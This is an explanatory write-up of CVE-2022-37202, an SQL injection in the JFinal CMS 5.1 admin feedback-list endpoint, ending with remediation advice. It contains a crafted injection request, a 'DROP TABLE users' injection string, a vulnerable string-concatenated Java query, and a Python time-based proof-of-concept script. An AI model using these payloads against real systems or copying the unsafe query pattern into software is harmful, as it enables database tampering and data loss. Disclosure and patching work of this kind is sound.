In late 2022, security researchers discovered a critical vulnerability (CVE-2022-37202) in JFinal CMS version 5.1.. If you’re using JFinal CMS on your website, you should pay attention. This security issue lets hackers run malicious SQL code simply by changing a value in the URL. Here’s a clear breakdown of what CVE-2022-37202 is, how the exploit works, code snippets, and what you should do to stay secure.

What is JFinal CMS?

JFinal CMS is a Java-based, open-source content management system loved in the developer community for its ease of use and performance.

What is CVE-2022-37202?

CVE-2022-37202 is a vulnerability that allows attackers to perform SQL Injection through the /admin/advicefeedback/list endpoint. That means anyone with access to your admin panel could potentially run harmful SQL commands on your database by crafting a special request.

Original Reference

- GitHub Advisory GHSA-q7fq-jqpc-qcw7
- NVD Entry

The vulnerable endpoint is

/admin/advicefeedback/list

This endpoint is typically used to list user feedbacks via the admin dashboard. However, the parameter handling in JFinal CMS 5.1. does not safely sanitize user inputs.

How the Attack Works

An attacker can manipulate certain request parameters (like order or sort) to inject malicious SQL. The CMS uses these parameters directly in SQL queries without proper escaping.

A simple HTTP request to exploit this flaw could look like this

GET /admin/advicefeedback/list?order=id;SELECT%201%20FROM%20admin--
Host: target-site.com
Cookie: [your_admin_session_cookie]

Here, order is injected with part of an SQL statement. If you are logged in as an admin, or the admin panel does not have IP/DDoS protections, attackers can use this as a direct vector.

Inside the application, here’s a pseudo-Java code showing the vulnerable logic

String order = getPara("order"); // User input from URL
String sql = "SELECT * FROM advicefeedback ORDER BY " + order; // No sanitization!
List<AdviceFeedback> results = AdviceFeedback.dao.find(sql);

Problem:order comes straight from the user's browser and goes directly into a live SQL query. If order contains something like id desc; DROP TABLE users; --, the query becomes dangerous.

The following Python script performs a basic PoC against a vulnerable JFinal CMS 5.1. installation

import requests

# Set up your target and session
target = 'http://victim.com/admin/advicefeedback/list';
cookie = {'JSESSIONID': 'your-session-cookie-here'}

# SQL Injection payload
payload = 'id desc, (select sleep(5))--'

params = {
    'order': payload,
}

print('[*] Sending SQL injection payload...')
response = requests.get(target, params=params, cookies=cookie, timeout=10)

if response.elapsed.total_seconds() > 5:
    print('[!] The site is sleeping! Potentially vulnerable to SQL injection.')
else:
    print('[-] No delay detected. Does not seem vulnerable, or site patched.')

Note: You must be authenticated as admin for this to work!

How To Fix

1. Update JFinal CMS: Check the JFinal CMS Releases page for a patched version.
2. Sanitize Inputs: Always validate and sanitize user inputs. Use parameterized queries or ORM frameworks to prevent SQL Injection.

Restrict Access: Limit admin panel access to trusted IPs and use strong authentication.

4. Monitor Logs: Regularly check logs for suspicious activity in /admin/advicefeedback/list.

Conclusion

CVE-2022-37202 is a classic SQL Injection vulnerability that highlights why you must never trust user input. If you’re running JFinal CMS 5.1., patch immediately and double-check your code for similar unsafe patterns.

More References

- Exploit-DB Listing
- OWASP SQL Injection Cheat Sheet

Timeline

Published on: 10/26/2022 18:15:00 UTC
Last modified on: 10/28/2022 17:46:00 UTC